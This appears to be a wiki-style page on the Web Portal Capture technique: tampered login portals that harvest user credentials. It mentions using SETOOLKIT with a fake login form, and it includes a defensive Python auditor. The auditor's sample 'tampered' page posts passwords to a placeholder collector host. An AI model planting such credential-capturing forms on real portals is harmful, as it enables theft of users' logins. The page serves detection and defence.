# Web Portal Capture

Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit the credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.

This variation on input capture may be conducted post-compromise, using legitimate administrative access, as a backup measure to maintain network access through External Remote Services and Valid Accounts, or as part of the Initial Compromise by exploitation of the externally facing web service.

**Example:**

Here, a simple login form written in HTML is combined with the SETOOLKIT tool so that the custom login form captures the credentials a user submits. This only needs some social engineering to get the user to enter their credentials.

![](/files/-MRkg7jzW0FER3eC55z5)
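From the defender's side, a portal login page can be audited for the two client-side signs of this technique: a password form that submits somewhere other than the portal itself, and scripts loaded from hosts that are not expected. The following is an added example, not code from the original page; the `audit` function, the finding labels, the sample pages and every hostname are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample pages (not from the original page); all hostnames are placeholders.
CLEAN = ('<form action="/login" method="post"><input name="user">'
         '<input type="password" name="pass"></form>'
         '<script src="/static/portal.js"></script>')
TAMPERED = ('<form action="https://collector.example.net/submit" method="post">'
            '<input type="password" name="pass"></form>'
            '<script src="https://cdn.example.net/k.js"></script>')


class LoginPageAudit(HTMLParser):
    """Record where password fields are submitted and where scripts load from."""
    def __init__(self, page_url, allowed_hosts):
        super().__init__()
        self.page_url = page_url
        self.allowed = set(allowed_hosts)
        self.form_action = None  # resolved action of the <form> currently open
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # An empty or missing action submits to the page's own URL.
            self.form_action = urljoin(self.page_url, a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            target = urlparse(self.form_action or self.page_url)
            if target.hostname not in self.allowed:
                self.findings.append(("password-form-off-host", target.geturl()))
            elif target.scheme != "https":
                self.findings.append(("password-form-not-https", target.geturl()))
        elif tag == "script" and a.get("src"):
            src = urljoin(self.page_url, a["src"])
            if urlparse(src).hostname not in self.allowed:
                self.findings.append(("script-off-host", src))

    def handle_endtag(self, tag):
        if tag == "form":
            self.form_action = None


def audit(html, page_url, allowed_hosts):
    """Return (finding, url) tuples; an empty list means nothing was flagged."""
    parser = LoginPageAudit(page_url, allowed_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings
```

This only inspects the HTML that is served, so it will not see credential logging added to server-side code or to an inline or first-party script. Pair it with a file-integrity baseline of the portal's files for those cases.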

